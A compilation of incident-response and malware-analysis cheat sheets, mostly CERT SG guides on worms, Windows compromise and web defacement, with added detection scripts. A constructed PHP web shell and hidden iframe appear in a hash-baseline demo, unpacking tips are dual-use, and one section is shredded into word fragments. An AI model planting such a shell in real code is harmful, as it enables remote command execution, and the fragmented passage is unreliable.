6. Repeat steps 2, 3, and 4 (order may vary) until analysis objectives are met.
7. Document findings and clean up the laboratory for future analysis.

Behavioral Analysis

- Be ready to revert to good state via dd, VMware snapshots, CoreRestore, Ghost, SteadyState, etc.
- Monitor local (Process Monitor, Process Explorer) and network (Wireshark, tcpdump) interactions.
- Detect major local changes (RegShot, Autoruns).
- Redirect network traffic (hosts file, DNS, Honeyd).
- Activate services (IRC, HTTP, SMTP, etc.) as needed to evoke new behavior from the specimen.

IDA Pro for Static Code Analysis

- Text search: Alt+T
- Show strings window: Shift+F12
- Show operand as hex value: Q
- Insert comment
- Follow jump or call in view: Enter
- Return to previous view: Esc
- Go to next view: Ctrl+Enter
- Show names window: Shift+F4
- Display function's flow chart: F12
- Display graph of function calls: Ctrl+F12
- Go to program's entry point: Ctrl+E
- Go to specific address: G
- Rename a variable or function: N
- Show listing of names: Ctrl+L
- Display listing of segments: Ctrl+S
- Show cross-references to selected function: Select function name » Ctrl+X
- Show stack of current function: Ctrl+K

OllyDbg for Dynamic Code Analysis

- Step into instruction: F7
- Step over instruction: F8
- Execute till next breakpoint: F9
- Execute till next return: Ctrl+F9
- Show previous/next executed instruction: - / +
- Return to previous view: *
- Show memory map: Alt+M
- Follow expression in view: Ctrl+G
- Insert comment
- Follow jump or call in view: Enter
- Show listing of names: Ctrl+N
- New binary search: Ctrl+B
- Next binary search result: Ctrl+L
- Show listing of software breakpoints: Alt+B
- Assemble instruction in place of selected one: Select instruction » Spacebar
- Edit data in memory or instruction opcode: Select data or instruction » Ctrl+E
- Show SEH chain: View » SEH chain
- Show patches: Ctrl+P

Bypassing Malware Defenses

- To try unpacking quickly, infect the system and dump from memory via LordPE or OllyDump.
- For more surgical unpacking, locate the Original Entry Point (OEP) after the unpacker executes.
- If you cannot unpack cleanly, examine the packed specimen via dynamic code analysis while it runs.
- When unpacking in OllyDbg, try SFX (bytewise) and OllyDump's "Find OEP by Section Hop".
- Conceal OllyDbg via HideOD and OllyAdvanced.
- A JMP or CALL to EAX may indicate the OEP, possibly preceded by POPA or POPAD.
- Look out for tricky jumps via SEH, RET, CALL, etc.
- If the packer uses SEH, anticipate OEP by tracking stack areas used to store the packer's handlers.
- Decode protected data by examining results of the decoding function via dynamic code analysis.
- Correct PE header problems with XPELister, LordPE, ImpREC, PEiD, etc.
- To get closer to OEP, try breaking on unpacker's calls to LoadLibraryA or GetProcAddress.

Common

 x86

 Registers

 and

 Uses 

EAX 

Addition, m

ultiplication, function

 results 

ECX 

Counter 

EBP 

 

Base

 for referencing

 function

 arguments

 (EBP+value) and

 local variables (EBP

‐value) 

ESP 

 Points

 to th

e current “top” of the

 stack; 

changes via

 PUSH, POP, and

 others

 

EIP 

Points

 to th

e next

 instruction

 

EFLAGS 

 Contains flags that store

 outcomes of 

computations (e.g.,

 Zero

 and

 Carry

 flags)

 

 

Authored

 by Lenny

 Zeltser,

 who

 leads the

 security

 consulting

 practice

 at S

avvis

 and

 teaches at S

ANS

 Institute. You

 can

 find

 him

 at h

ttp://twitter.com/lennyzeltser.

 See

 Lenny’s

 other cheat sheets

 at h

ttp://zeltser.com/cheat‐sheets. Creative

 Commons v3

 “Attribution” License

 for this

 cheat sheet version

 1.5.


Preparation

- Define actors, for each entity, who will be involved in the crisis cell. These actors should be documented in a contact list kept permanently up to date.
- Make sure that analysis tools are up, functional (Antivirus, IDS, log analysers), not compromised, and up to date.
- Make sure to have an architecture map of your networks.
- Make sure that an up to date inventory of the assets is available.
- Perform a continuous security watch and inform the people in charge of security about the threat trends.

Identification

Detect the infection
Information coming from several sources should be gathered and analyzed:
- Antivirus logs,
- Intrusion Detection Systems,
- Suspicious connection attempts on servers,
- High amount of accounts locked,
- Suspicious network traffic,
- Suspicious connection attempts in firewalls,
- High increase of support calls,
- High load or system freeze,
- High volumes of e-mail sent.
If one or several of these symptoms have been spotted, the actors defined in the "preparation" step will get in touch and, if necessary, create a crisis cell.

Identify the infection
Analyze the symptoms to identify the worm, its propagation vectors and countermeasures. Leads can be found from:
- CERT's bulletins;
- External support contacts (antivirus companies, etc.);
- Security websites (Secunia, SecurityFocus, etc.).
Notify the Chief Information Security Officer. Contact your CERT if required.

Assess the perimeter of the infection
Define the boundaries of the infection (i.e.: global infection, bounded to a subsidiary, etc.). If possible, identify the business impact of the infection.

Containment

The following actions should be performed and monitored by the crisis management cell:
1. Disconnect the infected area from the Internet.
2. Isolate the infected area. Disconnect it from any network.
3. If business-critical traffic cannot be disconnected, allow it after ensuring that it cannot be an infection vector, or find validated circumvention techniques.
4. Neutralize the propagation vectors. A propagation vector can be anything from network traffic to a software flaw. Relevant countermeasures have to be applied (patch, traffic blocking, disable devices, etc.). For example, the following techniques can be used:
   - Patch deployment tools (WSUS),
   - Windows GPO,
   - Firewall rules,
   - Operational procedures.
5. Repeat steps 2 to 4 on each sub-area of the infected area until the worm stops spreading. If possible, monitor the infection using analysis tools (antivirus console, server logs, support calls). The spreading of the worm must be monitored.

Mobile devices
Make sure that no laptop, PDA or mobile storage can be used as a propagation vector by the worm. If possible, block all their connections. Ask end-users to follow directives precisely.


Incident Response Methodology IRM #1
Worm Infection Response
Guidelines to handle information system Worm infections

IRM Author: CERT SG / Vincent Ferran-Lacome
IRM version: 1.2
E-Mail: cert.sg@socgen.com
Web: http://cert.societegenerale.com
Twitter: @CertSG

Remediation

Identify
Identify tools and remediation methods. The following resources should be considered:
- Vendor fixes (Microsoft, Oracle, etc.)
- Antivirus signature database
- External support contacts
- Security websites
Define a disinfection process. The process has to be validated by an external structure, like your CERT for example.

Test
Test the disinfection process and make sure that it properly works without damaging any service.

Deploy
Deploy the disinfection tools. Several options can be used:
- Windows WSUS
- GPO
- Antivirus signature deployment
- Manual disinfection
Warning: some worms can block some of the remediation deployment methods. If so, a workaround has to be found.
Remediation progress should be monitored by the crisis cell.

Recovery

Verify all previous steps have been done correctly and get a management approval before following the next steps.
1. Reopen the network traffic that was used as a propagation method by the worm.
2. Reconnect sub-areas together.
3. Reconnect the mobile laptops to the area.
4. Reconnect the area to your local network.
5. Reconnect the area to the Internet.
All of these steps shall be made in a step-by-step manner and a technical monitoring shall be enforced by the crisis team.

Aftermath

Report
A crisis report should be written and made available to all of the actors of the crisis management cell. The following themes should be described:
- Initial cause of the infection
- Actions and timelines of every important event
- What went right
- What went wrong
- Incident cost

Capitalize
Actions to improve the worm infection management processes should be defined to capitalize on this experience.

Abstract

This Incident Response Methodology is a cheat sheet dedicated to incident handlers investigating a precise security issue.

Who should use IRM sheets?
• Administrators
• Security Operation Center
• CISOs and deputies
• CERTs (Computer Emergency Response Team)

Remember: If you face an incident, follow IRM, take notes and do not panic. Contact your CERT immediately if needed.

Incident handling steps
6 steps are defined to handle security Incidents:
Preparation: get ready to handle the incident
Identification: detect the incident
Containment: limit the impact of the incident
Remediation: remove the threat
Recovery: recover to a normal stage
Aftermath: draw up and improve the process
IRM provides detailed information for each step.

This document is for public use


Preparation

- A physical access to the suspicious system should be offered to the forensic investigator.
- A good knowledge of the usual network and local activities of the computer is appreciated. You should have a file describing the usual port activity, to have a comparison base with the current state.
- A good knowledge of the commonly used services and installed applications is needed. Don't hesitate to ask a Windows Expert for his assistance, when applicable.

Identification

General signs of malware presence on the desktop
Several leads might hint that the system could be compromised by a malware:
- Antivirus raising an alert, or unable to update its signatures, or stopping to run, or unable to run even manually.
- Unusual hard-disk activity: the hard drive makes huge operations at unexpected times.
- Unusually slow computer: while it was usually delivering good speed, it got slower recently.
- Unusual network activity: the Internet connection is very slow most of the browsing time.
- The computer reboots without reason.
- Some applications are crashing unexpectedly.
- Pop-up windows are appearing while browsing on the web (sometimes even without browsing).
- Your IP address (if static) is blacklisted on one or more Internet Black Lists.
- People are complaining about you e-mailing them/reaching them by IM etc. while you did not.

Actions below use default Windows tools. Authorized users can use the Sysinternals Troubleshooting Utilities to perform these tasks.

Unusual Accounts
Look for unusual and unknown accounts created, especially in the Administrators group:
C:\> lusrmgr.msc

Unusual Files
- Look for unusual big files on the storage support; bigger than 10MB seems to be reasonable.
- Look for unusual files added recently in system folders, especially C:\WINDOWS\system32.
- Look for files using the "hidden" attribute:
C:\> dir /S /A:H

Unusual Registry Entries
Look for unusual programs launched at boot time in the Windows registry, especially:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
HKLM\Software\Microsoft\Windows\CurrentVersion\Runonce
HKLM\Software\Microsoft\Windows\CurrentVersion\RunonceEx
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
Check for the same entries in HKCU.

Unusual Processes and Services
- Check all running processes for unusual/unknown entries, especially processes with username "SYSTEM" and "ADMINISTRATOR":
C:\> taskmgr.exe (or tlist, tasklist depending on Windows release)
- Look for unusual/unexpected network services installed and started:
C:\> services.msc
C:\> net start
Note: a good knowledge of the usual services is needed.

Unusual Network Activity
- Check for file shares and verify each one is linked to a normal activity:
C:\> net view \\127.0.0.1
- Look at the opened sessions on the machine:
C:\> net session
- Have a look at the shares the machine has opened with other systems:
C:\> net use
- Check for any suspicious NetBIOS connection:
C:\> nbtstat -S
- Look for any suspicious activity on the system's TCP/IP ports:
C:\> netstat -na 5
(-na 5 sets the refresh interval to 5 seconds)
Use the -o flag for Windows XP/2003 to see the owner of each process:
C:\> netstat -nao 5
- Use a sniffer (Wireshark, tcpdump etc.) and see if there are unusual attempts of connections to or from remote systems. If no suspicious activity is witnessed, do use the sniffer while browsing some sensitive websites (banking website for example) and see if there is a particular network activity. Note: a good knowledge of the legitimate network activity is needed.

Unusual Automated Tasks
- Look at the list of scheduled tasks for any unusual entry:
C:\> at
On Windows 2003/XP:
C:\> schtasks
- Also check the user's autostart directories:
C:\Documents and Settings\user\Start Menu\Programs\Startup
C:\WinNT\Profiles\user\Start Menu\Programs\Startup

Unusual Log Entries
- Watch your log files for unusual entries:
C:\> eventvwr.msc
- Search for events like the following:
"Event log service was stopped"
"Windows File Protection is not active"
"The protected System file <name> was not restored to its original"
"Telnet Service has started successfully"
- Watch your firewall (if any) log files for suspect activity.

You can also use an up-to-date antivirus to identify malware on the system, but be aware that it could destroy evidence. In case nothing suspicious has been found, it doesn't mean that the system is not infected. A rootkit could be active, for example, distracting all your tools from giving good results. Further forensic investigation can be done on the system while it is off, if the system is still suspicious. The ideal case is to make a bit-by-bit copy of the hard disk containing the system, and to analyse the copy using forensic tools like EnCase or X-Ways.
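A way to turn the "comparison base" of usual port activity into an automated check, as an added example that is not part of the CERT SG IRM: it parses `netstat -nao` output (the "Unusual Network Activity" checks of IRM #7 above, which IRM #2 repeats) and reports listeners and remote peers absent from a baseline recorded on the clean machine. The sample netstat output and the baseline sets are constructed.

```python
"""Compare a live `netstat -nao` listing with the recorded baseline of usual port
activity that the IRM asks you to keep, and report what is new.

Added example, not part of the CERT SG IRM. The netstat output and the baseline
below are constructed sample data."""
import re
from dataclasses import dataclass

# Constructed `netstat -nao` sample (Windows XP/2003 layout with the -o PID column).
SAMPLE_NETSTAT = """
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       912
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:4444           0.0.0.0:0              LISTENING       1604
  TCP    10.0.0.5:1043          10.0.0.20:445          ESTABLISHED     4
  TCP    10.0.0.5:1051          198.51.100.7:6667      ESTABLISHED     1604
  UDP    0.0.0.0:137            *:*                                    4
"""

# Constructed baseline recorded from the machine in its clean state:
# listeners as "PROTO:port", remote peers as "ip:port".
BASELINE_LISTENERS = {"TCP:135", "TCP:445", "UDP:137"}
BASELINE_PEERS = {"10.0.0.20:445"}

# proto, local ip, local port, foreign address, optional state, PID
LINE_RE = re.compile(
    r"^\s*(TCP|UDP)\s+(\S+):(\d+)\s+(\S+)\s+(?:([A-Z_]+)\s+)?(\d+)\s*$"
)


@dataclass(frozen=True)
class Conn:
    proto: str
    local_port: int
    foreign: str
    state: str
    pid: int


def parse_netstat(text: str) -> list[Conn]:
    """Parse the data rows of `netstat -nao`; header and blank lines are skipped."""
    conns = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m is None:
            continue
        proto, _local_ip, local_port, foreign, state, pid = m.groups()
        # UDP rows carry no state column; treat a bound UDP socket as a listener.
        if proto == "UDP" and state is None:
            state = "LISTENING"
        conns.append(Conn(proto, int(local_port), foreign, state or "", int(pid)))
    return conns


def find_unusual(conns, baseline_listeners, baseline_peers):
    """Return (new_listeners, new_peers): listening sockets whose PROTO:port is not
    in the baseline, and established connections to a remote endpoint not in it."""
    new_listeners, new_peers = [], []
    for c in conns:
        if c.state == "LISTENING":
            if f"{c.proto}:{c.local_port}" not in baseline_listeners:
                new_listeners.append(c)
        elif c.state == "ESTABLISHED" and c.foreign not in baseline_peers:
            new_peers.append(c)
    return new_listeners, new_peers


def pids_to_check(conns_of_interest) -> list[int]:
    """PIDs behind the unusual sockets, to look up with tasklist or Process Explorer."""
    return sorted({c.pid for c in conns_of_interest})


if __name__ == "__main__":
    conns = parse_netstat(SAMPLE_NETSTAT)
    listeners, peers = find_unusual(conns, BASELINE_LISTENERS, BASELINE_PEERS)
    for c in listeners:
        print(f"new listener  {c.proto}:{c.local_port}  pid={c.pid}")
    for c in peers:
        print(f"new peer      {c.foreign} ({c.proto} {c.state})  pid={c.pid}")
    print("PIDs to check:", pids_to_check(listeners + peers))
```

On the sample data the unknown TCP 4444 listener and the connection to 198.51.100.7:6667 both belong to PID 1604, which is the process to look up next.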


Incident Response Methodology IRM #7
Windows Malware Detection
Live Analysis on a suspicious computer

IRM Author: CERT / Cédric Pernet
IRM version: 1.2
E-Mail: cert.sg@socgen.com
Web: http://cert.societegenerale.com
Twitter: @CertSG

Containment

Pull the network plug off physically, to prevent more infection on the network and to stop probable illegal action being done from your computer (the malware could send spam massively, take part in a DDoS attack or store illegal files on the system, for example).
Send the suspect binaries to your CERT, or request the CERT's help if you are unsure about the malware. The CERT should be able to isolate the malicious content and can send it to all AV companies, especially to contractors of your company. (The best way is to create a zipped file of the suspicious binary, encrypted using a password.)

Remediation

Reboot from a live CD and backup all important data on an external storage support. If unsure, bring your hard disk to the helpdesk and ask them to make a copy of the important content.
Remove the binaries and the related registry entries.
- Find the best practices to remove the malware. They can usually be found on AntiVirus companies' websites.
- Run an online antivirus scan.
- Launch a BartPE-based live CD containing disinfection tools (can be downloaded from AV websites), or a dedicated anti-virus live CD.

Recovery

If possible, reinstall the OS and applications and restore the user's data from a trusted backup.
In case the computer has not been reinstalled completely:
Restore files which could have been corrupted by the malware, especially system files.
Reboot the machine after all the cleaning has been done, and check the system for its health, doing a virus scan of the whole system, hard disks and memory.

Aftermath

Report
An incident report should be written and made available to all of the stakeholders. The following themes should be described:
- Initial detection.
- Actions and timelines.
- What went right.
- What went wrong.
- Incident cost.

Capitalize
Actions to improve the Windows malware detection processes should be defined to capitalize on this experience.

Abstract

This Incident Response Methodology is a cheat sheet dedicated to handlers investigating a precise security issue.

Who should use IRM sheets?
• Administrators
• Security Operation Center
• CISOs and deputies
• CERTs (Computer Emergency Response Team)

Remember: If you face an incident, follow IRM, take notes and do not panic. Contact CERT immediately if needed.

Incident handling steps
6 steps are defined to handle security Incidents:
Preparation: get ready to handle the incident
Identification: detect the incident
Containment: limit the impact of the incident
Remediation: remove the threat
Recovery: recover to a normal stage
Aftermath: draw up and improve the process
IRM provides detailed information for each step.


Preparation

- A physical access to the suspicious system should be given to the forensic investigator. Physical access is preferred to remote access, since the hacker could detect the investigations done on the system (by using a network sniffer for example).
- A physical copy of the hard disk might be necessary for forensic and evidence purposes. Finally, if needed, physical access could be needed to disconnect the suspected machine from any network.
- A good knowledge of the usual network activity of the machine/server is needed. You should have a file in a secure place describing the usual port activity, to compare efficiently to the current state.
- A good knowledge of the usual services running on the machine can be very helpful. Don't hesitate to ask a Windows Expert for his assistance, when applicable. A good idea is also to have a map of all services/running processes of the machine.

It can be a real advantage to work in a huge corporate environment, where all user machines are the same, installed from a master CD. Have a map of all processes/services/applications. In such an environment, where users are not allowed to install software, consider any additional process/service/application as suspicious. The more you know the machine in its clean state, the more chances you have to detect any fraudulent activity running from it.
Please note that the Sysinternals Troubleshooting Utilities can be used to perform most of these tasks.

Identification

Unusual Accounts
Look for unusual accounts created, especially in the Administrators group:
C:\> lusrmgr.msc
or
C:\> net localgroup administrators (or net localgroup administrateurs)

Unusual Files
- Look for unusually big files on the storage support, bigger than 5MB (can be an indication of a system compromised for illegal content storage).
- Look for unusual files added recently in system folders, especially C:\WINDOWS\system32.
- Look for files using the "hidden" attribute:
C:\> dir /S /A:H
- Use "windirstat" if possible.

Unusual Registry Entries
Look for unusual programs launched at boot time in the Windows registry, especially:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
HKLM\Software\Microsoft\Windows\CurrentVersion\Runonce
HKLM\Software\Microsoft\Windows\CurrentVersion\RunonceEx
Use "HiJackThis" if possible. (Also have a look in your Startup folder.)

Unusual Processes and Services
- Check all running processes for unusual/unknown entries, especially processes with username "SYSTEM" and "ADMINISTRATOR":
C:\> taskmgr.exe (or tlist, tasklist depending on Windows release)
Use "psexplorer" if possible.
- Check the user's autostart folders:
C:\Documents and Settings\user\Start Menu\Programs\Startup
C:\WinNT\Profiles\user\Start Menu\Programs\Startup
- Look for unusual/unexpected network services installed and started:
C:\> services.msc
C:\> net start

Unusual Network Activity
- Check for file shares and verify each one is linked to a normal activity:
C:\> net view \\127.0.0.1
Use "tcpview" if possible.
- Look at the opened sessions on the machine:
C:\> net session
- Have a look at the sessions the machine has opened with other systems:
C:\> net use
- Check for any suspicious NetBIOS connection:
C:\> nbtstat -S
- Look for any suspicious activity on the system's ports:
C:\> netstat -na 5
(5 makes it refresh every 5 seconds)
Use the -o flag for Windows XP/2003 to see the owner of each process:
C:\> netstat -nao 5
Use "fport" if possible.

Unusual Automated Tasks
Look at the list of scheduled tasks for any unusual entry:
C:\> at
On Windows 2003/XP:
C:\> schtasks

Unusual Log Entries
Watch your log files for unusual entries:
C:\> eventvwr.msc
If possible, use "Event Log Viewer" or such a tool.
Search for events affecting the firewall, the antivirus, the file protection, or any suspicious new service. Look for a huge amount of failed login attempts or locked out accounts. Watch your firewall (if any) log files for suspect activity.

Rootkit check
Run "Rootkit Revealer", "Rootkit Hooker", "Ice Sword", "Rk Detector", "SysInspector", "Rootkit Buster". It's always better to run several of these tools than only one.

Malware check
Run at least one anti-virus product on the whole disk. If possible, use several anti-virus products. The anti-virus must absolutely be up-to-date.
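Added example (not part of the CERT SG IRM) covering the "Unusual Log Entries" checks of IRM #2 above and the marker messages listed in IRM #7: it scans an exported event log for those messages and for bursts of failed logons and account lockouts. The log lines are constructed, and the tab-separated export format is an assumption.

```python
"""Scan an exported Windows event log for the entries the IRM tells you to hunt
for: the event log service stopping, Windows File Protection going inactive, a
Telnet service starting, services being installed, and bursts of failed logons
or account lockouts.

Added example, not part of the CERT SG IRM. The log lines are constructed; the
assumed export format is one event per line, tab-separated:
time<TAB>source<TAB>event id<TAB>message."""
import re
from collections import Counter

# Message fragments from the IRM's "Unusual Log Entries" list, plus a generic
# service-installation marker for the "suspicious new service" check.
MARKER_MESSAGES = (
    "Event log service was stopped",
    "Windows File Protection is not active",
    "was not restored to its original",
    "Telnet Service has started successfully",
    "service was installed",
)

FAILED_LOGON_IDS = {529, 4625}   # logon failure (Windows 2003 / Vista+ security log)
LOCKOUT_IDS = {644, 4740}        # account locked out (Windows 2003 / Vista+)
ACCOUNT_RE = re.compile(r"(?:User Name|Target Account Name):\s*(\S+)", re.IGNORECASE)


def parse_line(line: str):
    """Split one exported line into (time, source, event_id, message), or None."""
    parts = line.rstrip("\n").split("\t", 3)
    if len(parts) != 4 or not parts[2].strip().isdigit():
        return None
    time, source, event_id, message = parts
    return time, source, int(event_id), message


def scan_log(text: str, failed_threshold: int = 10) -> dict:
    """Return the marker events found, failed-logon counts per account, the
    accounts at or above the brute-force threshold, and the locked-out accounts."""
    markers, failed, locked = [], Counter(), []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        time, source, event_id, message = rec
        if any(m.lower() in message.lower() for m in MARKER_MESSAGES):
            markers.append((time, source, event_id, message))
        acct = ACCOUNT_RE.search(message)
        if event_id in FAILED_LOGON_IDS and acct:
            failed[acct.group(1).lower()] += 1
        elif event_id in LOCKOUT_IDS and acct:
            locked.append(acct.group(1).lower())
    suspects = sorted(a for a, n in failed.items() if n >= failed_threshold)
    return {"markers": markers, "failed_logons": failed,
            "brute_force_accounts": suspects, "locked_accounts": locked}


# Constructed sample export: a Telnet service start, the event log service being
# stopped, a burst of failed logons against "Administrator", then a lockout.
SAMPLE_LOG = (
    "2009-03-02 09:12:01\tService Control Manager\t7036\tThe Telnet Service has started successfully.\n"
    "2009-03-02 09:12:05\tEventlog\t6006\tThe Event log service was stopped.\n"
    + "".join(
        f"2009-03-02 09:13:{s:02d}\tSecurity\t529\tLogon Failure: Unknown user name or bad password. "
        f"User Name: Administrator Domain: WORKGROUP\n"
        for s in range(12)
    )
    + "2009-03-02 09:14:00\tSecurity\t644\tUser Account Locked Out: Target Account Name: Administrator\n"
    "2009-03-02 09:16:00\tSecurity\t528\tSuccessful Logon: User Name: jdoe Domain: WORKGROUP\n"
)

if __name__ == "__main__":
    result = scan_log(SAMPLE_LOG)
    for time, source, event_id, message in result["markers"]:
        print(f"{time}  {source} {event_id}: {message}")
    print("failed logons:", dict(result["failed_logons"]))
    print("possible brute force:", result["brute_force_accounts"])
    print("locked out:", result["locked_accounts"])
```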


C

onta

inm

ent

Rem

edia

tion

Rec

over

y

Afte

rmat

h

In

cide

nt R

espo

nse

Met

hodo

logy

IRM

#2

W

indo

ws

Intr

usio

n D

etec

tion

Live

Ana

lysi

s on

a s

uspi

ciou

s W

indo

ws

syst

em

__

____

____

____

____

____

____

____

____

____

____

____

____

_ IR

M A

utho

r: C

ER

T S

G/ C

edric

Per

net

IRM

ver

sion

: 1.2

E

-Mai

l: ce

rt.sg

@so

cgen

.com

W

eb: h

ttp://

cert.

soci

eteg

ener

ale.

com

Tw

itter

: @C

ertS

G

Abs

trac

t

Inci

dent

han

dlin

g st

eps

If

the

mac

hine

is

co

nsid

ered

cr

itica

l fo

r yo

ur

com

pany

’s

busi

ness

ac

tivity

an

d ca

n’t

be

disc

onne

cted

, ba

ckup

al

l im

porta

nt d

ata

in c

ase

the

hack

er n

otic

es y

ou’re

inv

estig

atin

g an

d st

arts

del

etin

g fil

es.

Als

o m

ake

a co

py o

f th

e sy

stem

’s

mem

ory

for

furth

er

anal

ysis

. (u

se

tool

s su

ch

as

Mem

oryz

e,w

in32

dd e

tc.)

If th

e m

achi

ne is

not

con

side

red

criti

cal f

or y

our

com

pany

and

ca

n be

dis

conn

ecte

d, s

hut

the

mac

hine

dow

n th

e ha

rd w

ay,

rem

ovin

g its

pow

er p

lug.

If

it is

a la

ptop

with

a b

atte

ry o

n, ju

st

push

the

“of

f” bu

tton

for

som

e se

cond

s un

til t

he c

ompu

ter

switc

hes

off.

Offline investigations should be started right away if the live analysis didn't give any result, but the system should still be considered compromised.

Make a physical copy (bit by bit) of the whole hard disk on an external storage support, using EnCase, X-Ways, or a similar forensic tool (dd, ddrescue, etc.).

Try to find evidence of every action of the hacker:
■ Find all files used by the attacker, including deleted files (use your forensic tools), and see what has been done with them, or at least their functionality, in order to evaluate the threat.
■ Check all files accessed recently.
■ Inspect network shares to see if the malware has spread through them.
■ More generally, try to find how the attacker got into the system. All leads should be considered. If no computer proof of the intrusion is found, never forget it could come from physical access or from complicity/stealing of information from an employee.
■ Apply fixes when applicable (operating system and applications), in case the attacker used a known vulnerability.

In case the system has been compromised:
■ Temporarily remove all access to the accounts involved in the incident.
■ Remove all malicious files installed by the attacker.

No matter how far the hacker has gone into the system and the knowledge you might have about the compromise, as long as the system has been penetrated, the best practice is to reinstall the system fully from original media and apply all fixes to the newly installed system.

In case this solution can't be applied, you should:
■ Change all the system's account passwords, and make your users do so in a secure way: they should use passwords with upper/lower case, special characters, numbers, and at least 8 characters long.
■ Restore all files that could have been changed by the attacker (example: svchost.exe).


This Incident Response Methodology is a cheat sheet dedicated to incident handlers investigating a precise security issue.

Who should use IRM sheets?
• Administrators
• Security Operation Center
• CISOs and deputies
• CERTs (Computer Emergency Response Team)

Remember: If you face an incident, follow IRM, take notes and do not panic. Contact your CERT immediately if needed.

Report
A crisis report should be written and made available to all of the actors of the crisis management cell. The following themes should be described:
■ Initial detection
■ Actions and timelines of every important event
■ What went right
■ What went wrong
■ Incident cost

Capitalize
Actions to improve the Windows intrusion detection management processes should be defined to capitalize on this experience.

6 steps are defined to handle security incidents
1. Preparation: get ready to handle the incident
2. Identification: detect the incident
3. Containment: limit the impact of the incident
4. Remediation: remove the threat
5. Recovery: recover to a normal stage
6. Aftermath: draw up and improve the process

IRM provides detailed information for each step.
This document is for public use.


Preparation
Objective: Establish contacts, define procedures, and gather information to save time during an attack.
■ Have up-to-date schemes describing your applicative components related to the web server.
■ Build a backup website up and ready, on which you can publish content.
■ Define a procedure to redirect every visitor to this backup website.
■ Deploy monitoring tools to quickly detect any abnormal behaviour on your critical websites.
■ Export the web server's log files to an external server. Make sure clocks are synchronized between each server.
■ Reference external contents (static or dynamic) and create a list for each of them. Don't forget third parties for advertisement.
■ Reference contact points of your hosting provider.
■ Be sure your hosting provider enforces policies to log all events.
■ Make sure you have an up-to-date network map.

Identification
Objective: Detect the incident, determine its scope, and involve the appropriate parties.
Usual channels of detection are:
■ Web page monitoring: The content of a web page has been altered. The new content is either very discreet (an "iframe" injection for example) or obvious ("You have been 0wn3d by xxx").
■ User: users call or notification from employees about problems they noticed while browsing the website.
■ Security checks with tools such as Google SafeBrowsing.

Verify the defacement and detect its origin:
■ Check files with static content (in particular, check the modification dates and hash signatures).
■ Check mashup content providers.
■ Check links present in the web page (src, meta, css, script, …).
■ Check log files.
■ Scan the databases for malicious content.
■ The source code of the suspicious page must be analysed carefully to identify the problem clearly. In particular, be sure the problem is on a web server belonging to the company and not on web content located outside your infrastructure, like commercial banners from a third party.
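The "check files with static content" step above is only reliable against a baseline taken while the site was known-good. The following script is an added example (it is not part of the CERT-SG sheet): it records a SHA-256 baseline of a web root, then reports which files were modified, removed or added, and can also list files newer than the baseline file. It assumes the web root is a plain directory and that sha256sum (or shasum) is available; the sample site, the injected iframe and the dropped shell.php in the demo are constructed.

```shell
#!/bin/sh
# Added example, not part of the CERT-SG sheet.
# Hash baseline for a web root: detects modified, missing and new files.
# Assumptions: plain directory web root; sha256sum (or shasum -a 256) present;
# the baseline file is produced on a clean system and kept OFF the web server,
# since an attacker with write access could otherwise "fix" it as well.
# Paths containing whitespace are not handled (awk splits on whitespace).

if command -v sha256sum >/dev/null 2>&1; then
    HASH_CMD="sha256sum"
else
    HASH_CMD="shasum -a 256"     # macOS / BSD fallback
fi

# build_baseline WEBROOT OUTFILE  -> writes "hash  ./relative/path" per file
build_baseline() {
    ( cd "$1" && find . -type f -print | LC_ALL=C sort |
        while IFS= read -r f; do $HASH_CMD "$f"; done ) > "$2"
}

# check_baseline WEBROOT BASELINE -> prints "MODIFIED|MISSING|NEW path" lines;
# returns 1 if anything deviates, 0 if the web root still matches the baseline.
check_baseline() {
    current=$(mktemp)
    build_baseline "$1" "$current"
    diffs=$(awk 'FILENAME == ARGV[1] { base[$2] = $1; next }
                 { cur[$2] = $1 }
                 END {
                     for (p in base)
                         if (!(p in cur))            printf "MISSING %s\n", p
                         else if (cur[p] != base[p]) printf "MODIFIED %s\n", p
                     for (p in cur)
                         if (!(p in base))           printf "NEW %s\n", p
                 }' "$2" "$current" | LC_ALL=C sort)
    rm -f "$current"
    if [ -n "$diffs" ]; then
        printf '%s\n' "$diffs"
        return 1
    fi
    return 0
}

# recently_modified WEBROOT BASELINE -> files whose mtime is newer than the
# baseline file (the "modification dates" check). mtime is trivially forged
# with touch(1), so treat this as a hint and trust the hashes.
recently_modified() {
    find "$1" -type f -newer "$2" -print | LC_ALL=C sort
}

# --- demo on a constructed site ---------------------------------------------
demo() {
    site=$(mktemp -d)
    printf '<html><body>Welcome</body></html>\n' > "$site/index.html"
    printf 'body { color: #000; }\n'           > "$site/style.css"
    build_baseline "$site" "$site.baseline"
    # Simulated defacement: hidden iframe appended, webshell dropped, file removed
    printf '<iframe src="http://203.0.113.9/x" width=0 height=0></iframe>\n' >> "$site/index.html"
    printf '<?php system($_GET["c"]); ?>\n' > "$site/shell.php"
    rm -f "$site/style.css"
    check_baseline "$site" "$site.baseline" || echo "=> web root deviates from baseline"
    rm -rf "$site" "$site.baseline"
}
demo
```

In the demo the output is `MISSING ./style.css`, `MODIFIED ./index.html`, `NEW ./shell.php`, which is exactly the triage list the sheet asks for: the modified page to inspect for the injection, the new file to treat as the attacker's tool, the missing one to restore. Run `build_baseline` after every legitimate deployment and store the result with the exported logs, not on the web server.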

Containment
Objective: Mitigate the attack's effects on the targeted environment.
■ Back up all data stored on the web server for forensic purposes and evidence collecting. The best practice here, if applicable, is to make a complete bit-by-bit copy of the hard disk containing the web server. This will be helpful to recover deleted files.
■ Check your network architecture map. Verify that the vulnerability exploited by the attacker is not located somewhere else:
- Check the system on which the web server is running,
- Check other services running on that machine,
- Check the connections to other systems, which might be compromised.
If the source of the attack is another system on the network, disconnect it physically if possible and investigate on it.

Try to find evidence of every action of the attacker:
■ Find out how the attacker got into the system in the first place and fix it:
- Web component vulnerability allowing write access: fix the vulnerability by applying the editor's fix.
- Open public folder: fix the bug.
- SQL weakness allowing injection: correct the code.
- Mashup components: cut the mashup feed.
- Administrative modification by physical access: modify the access rights.
